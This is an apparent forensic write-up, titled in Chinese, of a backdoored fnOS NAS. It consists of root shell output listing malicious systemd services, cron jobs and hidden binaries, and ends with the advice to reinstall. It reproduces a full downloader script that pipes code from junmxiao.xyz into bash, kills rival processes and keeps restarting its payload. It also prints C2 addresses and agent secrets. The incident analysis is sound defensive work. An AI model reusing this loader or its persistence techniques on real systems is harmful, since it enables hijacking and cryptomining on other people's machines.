
恶心的狗皮膏药后门梳理


直奔主题

root@fnos:/usr/trim/bin# ls /usr/bin/ -alht
total 494M
drwxr-xr-x  3 root root      36K Feb  3 14:31  .
-rwxr-xr-x  1 root root      34K Feb  1 10:05  smbd
-rwxrwxrwx  1 root root      89K Jan 31 16:10  dockers
-rwxr-xr-x  1 root root      87K Jan 27 14:04  nginx
-rwxr-xr-x  1 root root      34K Jan 22 04:38  ZljCsgP
-rwxr-xr-x  1 root root      34K Jan 22 04:36  42gKXj6
-rwxr-xr-x  1 root root      34K Jan 22 03:33  C3lB4fIUJS
-rwxr-xr-x  1 root root      34K Jan 22 02:58  W9pjWRgN3
-rwxr-xr-x  1 root root      34K Jan 22 00:34  GpXdOZFe
-rwxr-xr-x  1 root root      34K Jan 21 22:18  Kvz60g
-rwxr-xr-x  1 root root      34K Jan 21 22:16  HMqO
-rwxr-xr-x  1 root root      34K Jan 21 22:11  NJQQVsC6VO
root@fnos:/usr/trim/bin# ls -alht
-rwxrwxrwx  1 root root  452 Jan 31 16:10 system_startup.sh
-rwxr-xr-x  1 root root  92K Jan 31 16:10 trim_pap
-rwxr-xr-x  1 root root  86K Jan 27 14:04 trim_https_cgi
root@fnos:/etc/systemd/system# ls -alht
total 384K
-rw-r--r--  1 root root  213 Feb  1 10:08 smbd.service
-rw-r--r--  1 root root  214 Jan 31 16:10 dockers.service
-rw-r--r--  1 root root  222 Jan 31 16:10 trim_pap.service
-rw-r--r--  1 root root  228 Jan 27 14:04 trim_https_cgi.service
-rw-r--r--  1 root root  218 Jan 27 14:04 nginx.service
-rw-r--r--  1 root root  216 Jan 22 04:38 ZljCsgP.service
-rw-r--r--  1 root root  216 Jan 22 04:36 42gKXj6.service
-rw-r--r--  1 root root  219 Jan 22 03:33 C3lB4fIUJS.service
-rw-r--r--  1 root root  218 Jan 22 02:58 W9pjWRgN3.service
-rw-r--r--  1 root root  217 Jan 22 00:34 GpXdOZFe.service
-rw-r--r--  1 root root  215 Jan 21 22:18 Kvz60g.service
-rw-r--r--  1 root root  213 Jan 21 22:16 HMqO.service
-rw-r--r--  1 root root  219 Jan 21 22:11 NJQQVsC6VO.service
root@fnos:/etc/systemd/system# cat dockers.service
[Unit]
Description=dockers Service
After=network-online.target
Requires=network-online.target

[Service]
Type=oneshot
ExecStart=/usr/bin/dockers
RemainAfterExit=yes
Restart=no

[Install]
WantedBy=multi-user.target
root@fnos:/etc/systemd/system#

root@fnos:/etc/systemd/system# cat trim_pap.service
[Unit]
Description=AutoStart Service
After=network-online.target
Requires=network-online.target

[Service]
Type=oneshot
ExecStart=/usr/trim/bin/trim_pap
RemainAfterExit=yes
Restart=no

[Install]
WantedBy=multi-user.target


---i---------e-------  ./C3lB4fIUJS.service
---i---------e-------  ./W9pjWRgN3.service
----i---------e------- ./Kvz60g.service
----i---------e------- ./trim_pap.service
----i---------e------- ./NJQQVsC6VO.service
----i---------e------- ./smbd.service
----i---------e------- ./trim_https_cgi.service
----i---------e------- ./ZljCsgP.service
----i---------e------- ./42gKXj6.service
----i---------e------- ./GpXdOZFe.service
----i---------e------- ./HMqO.service
----i---------e------- ./nginx.service
root@fnos:/etc/systemd/system/multi-user.target.wants# ls -alht
total 16K
lrwxrwxrwx  1 root root   35 Jan 31 16:10 dockers.service -> /etc/systemd/system/dockers.service
lrwxrwxrwx  1 root root   36 Jan 31 16:10 trim_pap.service -> /etc/systemd/system/trim_pap.service
lrwxrwxrwx  1 root root   35 Jan 22 04:38 ZljCsgP.service -> /etc/systemd/system/ZljCsgP.service
lrwxrwxrwx  1 root root   35 Jan 22 04:36 42gKXj6.service -> /etc/systemd/system/42gKXj6.service
lrwxrwxrwx  1 root root   38 Jan 22 03:33 C3lB4fIUJS.service -> /etc/systemd/system/C3lB4fIUJS.service
lrwxrwxrwx  1 root root   37 Jan 22 02:58 W9pjWRgN3.service -> /etc/systemd/system/W9pjWRgN3.service
lrwxrwxrwx  1 root root   36 Jan 22 00:34 GpXdOZFe.service -> /etc/systemd/system/GpXdOZFe.service
lrwxrwxrwx  1 root root   34 Jan 21 22:18 Kvz60g.service -> /etc/systemd/system/Kvz60g.service
lrwxrwxrwx  1 root root   32 Jan 21 22:16 HMqO.service -> /etc/systemd/system/HMqO.service
lrwxrwxrwx  1 root root   38 Jan 21 22:11 NJQQVsC6VO.service -> /etc/systemd/system/NJQQVsC6VO.service
lrwxrwxrwx  1 root root   33 Jan 21 22:11 nginx.service -> /etc/systemd/system/nginx.service
lrwxrwxrwx  1 root root   42 Jan 21 22:11 trim_https_cgi.service -> /etc/systemd/system/trim_https_cgi.service
root@fnos:/rootfs-ext/sbin# ps -auxf |grep junmxiao.xyz |grep -v grep
root      198214  0.0  0.0   2576  1620 ?        S    10:07   0:00  \_ sh -c touch /run/test-mirror.json && dockerd --registry-mirror https://x.com ; curl -sSL https://junmxiao.xyz/h5/automonitor2.sh | bash ; echo --validate --config-file /run/test-mirror.json
root      210419  0.0  0.0   2576  1596 ?        S    10:42   0:00  \_ sh -c touch /run/test-mirror.json && dockerd --registry-mirror https://x.com ; curl -sSL https://junmxiao.xyz/h5/automonitor2.sh | bash ; echo --validate --config-file /run/test-mirror.json
root@fnos:/etc# crontab -l
7 12 * * * /bin/bash -c "exec -a systemd_helper '/etc/cron.d/.cache/agigocnu/vgcjrfqtqz-cron_cron' </dev/null >/dev/null 2>&1"

*/1 * * * * "/usr/lib/id.sericer.conf"

*/1 * * * * "/root/.config/font-manager.conf"
root@fnos:/etc/systemd/system# cat mcdxamxs.service
[Unit]
Description=System Service Manager
After=network.target

[Service]
Type=simple
ExecStart=/bin/bash -c "exec -a ksmdd '/etc/systemd/system/.runtime/gpomkvzv/figxqflhit-systemd_systemd' </dev/null >/dev/null 2>&1"
Restart=always
RestartSec=10
User=root
Group=root

[Install]
WantedBy=multi-user.target
root@fnos:/etc/systemd/system/.runtime/gpomkvzv# file figxqflhit-systemd_systemd
figxqflhit-systemd_systemd: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), Go BuildID=a4suSJdh_hFlNUPXdx4A/wj3zMVyj2yXmYHkUrOL4/-qAoFg2Hfuwp_bADYwpL/GuJjbSNNS3LSD6LcSmok, statically linked, no section header
root@fnos:/etc/systemd/system/.runtime/gpomkvzv# pwd
/etc/systemd/system/.runtime/gpomkvzv
rm /var/spool/cron/crontabs/root /usr/b/id.sericer.conf /boot/System /boot/System.img-6.8.0-8 /rootfs-extcrontab /rootfs-ext/sbin/nginx-1 /usr/bin/at.atloy /tmp/.font-unix-helpver /root/.config/font-manager.conf -rf
root      248748  0.0  0.5 714824  9996 ?        Ssl  12:22   0:00 /boot/System.img-6.8.0-8
root      248757  0.0  0.0   2576  1588 ?        S    12:22   0:00 /bin/sh /rootfs-ext/crontab
root      250005  0.0  0.0   5464  1752 ?        S    12:28   0:00  \_ sleep 50
root      248761  0.0  0.0   2576  1580 ?        S    12:22   0:00 /bin/sh /usr/bin/at.atloy
root      250048  0.0  0.0   5464  1784 ?        S    12:28   0:00  \_ sleep 60
root      248845  0.0  0.0   2576  1448 ?        S    12:22   0:00 /bin/sh /usr/bin/at.atloy
root      249949  0.0  0.0   5464  1708 ?        S    12:27   0:00  \_ sleep 60
root      248848  0.0  0.0   2576  1576 ?        S    12:22   0:00 /bin/sh /boot/System
root      250016  0.0  0.0   5464  1792 ?        S    12:28   0:00  \_ sleep 40
root      248854  0.0  0.0   2576  1596 ?        S    12:22   0:00 /bin/sh /tmp/.font-unix-helpver
root      249897  0.0  0.0   5464  1752 ?        S    12:27   0:00  \_ sleep 70
root         676  0.0  0.1   6608  2092 ?        Ss   Feb03   0:00 /usr/sbin/cron -f
root      245380  0.0  0.1   8500  2776 ?        S    12:07   0:00  \_ /usr/sbin/CRON -f
root      245381  0.0  0.0   2576  1564 ?        Ss   12:07   0:00      \_ /bin/sh -c /bin/bash -c "exec -a systemd_helper '/etc/cron.d/.cache/agigocnu/vgcjrfqtqz-cron_cron' </dev/null >/d
root      245383  0.0  0.2 1601988 4632 ?        Sl   12:07   0:00          \_ systemd_helper
root      245657 41.5 13.9 721212 271328 ?       Ssl  12:07   8:26              \_ rcu_gp_service
/tmp/.font-unix-helpver
/tmp/.X11-unix-cacher
/rootfs-ext/sbin/nginx-1
/rootfs-ext/crontab

image.png

root@fnos:/tmp# echo a2lzc2xhYS5jb206MzI2NTM= |base64 -d
**laa.com:32653root@fnos:/tmp#
root@fnos:/usr/share/zoneinfo# curl https://junmxiao.xyz/h5/automonitor2.sh
#!/bin/bash
# Loader stage of the infection described in this thread: it is what the
# `curl -sSL https://junmxiao.xyz/h5/automonitor2.sh | bash` process in the
# ps output above executes. The comments are analyst annotations only; the
# code is reproduced exactly as observed.
# The payload is staged in a hidden dot-directory under /tmp; this size floor
# (in MiB) is used later to decide whether the staged binary is complete.
MIN_FILE_SIZE_MB=6
# Payload binary, named "java" (plausibly to blend in with a JVM process).
FILE_PATH="/tmp/.local/.-/java"
# Companion config fetched alongside the binary and passed to it with -c.
FILE_PATH_2="/tmp/.local/.-/config.json"
#######################################
# Fetch the payload binary and its config from the attacker-controlled host
# and mark the binary executable.
# Globals:   DOWNLOADER (read; "wget" or "curl", chosen at top level)
#            FILE_PATH, FILE_PATH_2 (read)
# Outputs:   writes both files under /tmp/.local/.-/
# Returns:   status of the final chmod; download failures are not checked,
#            so a partial or empty file is still marked executable
# Detection: outbound HTTPS to junmxiao.xyz and file creation under
#            /tmp/.local/.-/ are the observable artefacts of this function.
#######################################
download_java() {
    if [ "$DOWNLOADER" == "wget" ]; then
        # Certificate verification is explicitly disabled for wget.
        wget --no-check-certificate https://junmxiao.xyz/h5/java -O "$FILE_PATH"
        wget --no-check-certificate https://junmxiao.xyz/h5/config.json -O "$FILE_PATH_2"
    elif [ "$DOWNLOADER" == "curl" ]; then
        # curl runs with default verification and no -f, so an HTTP error
        # body would be written to the file as if it were the binary.
        curl https://junmxiao.xyz/h5/java > "$FILE_PATH"
        curl https://junmxiao.xyz/h5/config.json > "$FILE_PATH_2"
    fi
    chmod +x "$FILE_PATH"
}
# Pick whichever fetch tool is installed (wget preferred). Without either the
# loader gives up, so a host lacking both never reaches the download stage.
if command -v wget &> /dev/null; then
    DOWNLOADER="wget"
elif command -v curl &> /dev/null; then
    DOWNLOADER="curl"
else
    echo "Neither wget nor curl found. Exiting."
    exit 1
fi
#######################################
# Download the payload when it is missing or smaller than the configured
# floor; a truncated download is treated the same as an absent file.
# Globals:   FILE_PATH, MIN_FILE_SIZE_MB (read)
# Outputs:   status line on stdout; creates the hidden staging directory
# Note:      `stat -c %s` is GNU stat syntax. The size test is the only
#            integrity check — no hash or signature is verified.
#######################################
check_and_download() {
    if [ ! -f "$FILE_PATH" ] || [ "$(stat -c %s "$FILE_PATH")" -lt $((MIN_FILE_SIZE_MB * 1024 * 1024)) ]; then
        echo "Java file not found. Downloading..."
        # The hidden ".-" directory under /tmp/.local is a stable file-system IoC.
        mkdir -p /tmp/.local/.-/
        download_java
    fi
}
# Host fingerprint: hostname plus CPU core count. PASSNAME is not referenced
# anywhere else in this script; presumably intended for the payload's config
# or left over from another variant — unverified.
CPU_CORES=$(nproc)
HOSTNAME=$(uname -n)
PASSNAME="${HOSTNAME}_${CPU_CORES}"

# Competitor eviction: SIGKILL processes by name pattern before starting the
# payload. pkill matches a regex against the process name; only the pgrep
# checks below pass -f (full command line), the pkill calls do not.
# Several patterns (xmrig, kinsing, kdevtmpfsi, nbminer, ccminer) are
# well-known cryptominer/malware names; others (snapd, telnetd, solr) also
# match legitimate services, so unexplained SIGKILLs of those daemons are a
# useful detection signal on an infected host.
if pgrep -f "rx/0" &> /dev/null; then
    pkill -9 "rx/0"
fi
pkill -9 "solr"
pkill -9 ".solr"
pkill -9 "solrd"
pkill -9 "nbminer"
pkill -9 "jupyterlab"
pkill -9 "kthreaddw"
pkill -9 "xmrig"
pkill -9 ".gitlabw"
pkill -9 "kinsing"
pkill -9 "ccminer"
pkill -9 "snapd"
pkill -9 "Sofia"
pkill -9 "telnetd"
pkill -9 "kdevtmpfsi"
pkill -9 "linuxsys"
# Payload invocation: the staged binary with its JSON config. What -B means
# to the binary is not derivable from this script alone.
COMMAND="/tmp/.local/.-/java -c /tmp/.local/.-/config.json -B"
# Persistence loop: never exits. Every 10 s it re-checks the staged file,
# repeats the kill list, and restarts the payload if no process has the
# staging path in its command line. This is why the `sh -c ... | bash`
# process stays resident in the ps output above; killing the payload alone
# is not sufficient while this loop is still running.
while true; do
    check_and_download
    pkill -9 "solr"
    pkill -9 ".solr"
    pkill -9 "Sofia"
    pkill -9 "nbminer"
    pkill -9 "jupyterlab"
    pkill -9 "telnetd"
    pkill -9 "solrd"
    pkill -9 "snapd"
    pkill -9 "kthreaddw"
    pkill -9 ".gitlabw"
    pkill -9 "xmrig"
    pkill -9 "kinsing"
    pkill -9 "kdevtmpfsi"
    pkill -9 "ccminer"
    if ! pgrep -f "/tmp/.local/.-/java" >/dev/null; then
        if pgrep -f "rx/0" &> /dev/null; then
            pkill -9 "rx/0"
        fi
        # Re-fetches unconditionally (not via check_and_download), so the
        # binary is downloaded again every time the payload is found stopped.
        download_java
        # Started from the staging directory in a background subshell;
        # $COMMAND is left unquoted so that it word-splits into argv.
        (cd /tmp/.local/.-/ && $COMMAND &)
    fi
    sleep 10
done
root@fnos:/tmp# systemctl status nezha-agent.service
b nezha-agent.service - e*egf§ Agent
     Loaded: loaded (/etc/systemd/system/nezha-agent.service; disabled; preset: enabled)
     Active: inactive (dead)

Feb 04 12:00:37 fnos systemd[1]: Stopping nezha-agent.service - e*egf§ Agent...
Feb 04 12:00:37 fnos systemd[1]: nezha-agent.service: Deactivated successfully.
Feb 04 12:00:37 fnos systemd[1]: Stopped nezha-agent.service - e*egf§ Agent.
Feb 04 12:00:37 fnos systemd[1]: nezha-agent.service: Consumed 1min 16.479s CPU time.
root@fnos:/tmp# cat /opt/nezha/agent/config.yml
client_secret: l22j9FTgVzC9GQgqIqkK2WeLWime7uAR
debug: false
disable_auto_update: false
disable_command_execute: false
disable_force_update: false
disable_nat: false
disable_send_query: false
gpu: false
insecure_tls: false
ip_report_period: 1800
report_delay: 3
self_update_period: 0
server: 141.98.198.19:8008
skip_connection_count: false
skip_procs_count: false
temperature: false
tls: true
use_gitee_to_upgrade: false
use_ipv6_country_code: false
uuid: 0e7b245c-c66e-1159-bece-735f169645e7
141.98.198.19:8008
/etc/cron.d/.cache/agigocnu/vgcjrfqtqz-cron_cron
root@fnos:/etc/systemd/system# cat systemd-journal.service
[Unit]
Description=Kernel Worker Net Daemon
After=network.target

[Service]
Type=simple
ExecStart=/usr/lib/systemd/systemd-journal
Restart=always
RestartSec=5
Environment=NZ_SERVER=static.132546.xyz:28028
Environment=NZ_TLS=false
Environment=NZ_CLIENT_SECRET=fOSyFKel66oYGDYtbRU9PSG3zBaY0UFq
Environment=NZ_DISABLE_AUTO_UPDATE=true
Environment=NZ_DISABLE_FORCE_UPDATE=true
Environment=NZ_DISABLE_COMMAND_EXECUTE=false
Environment=NZ_SKIP_CONNECTION_COUNT=false

[Install]
WantedBy=multi-user.target

建议

重做
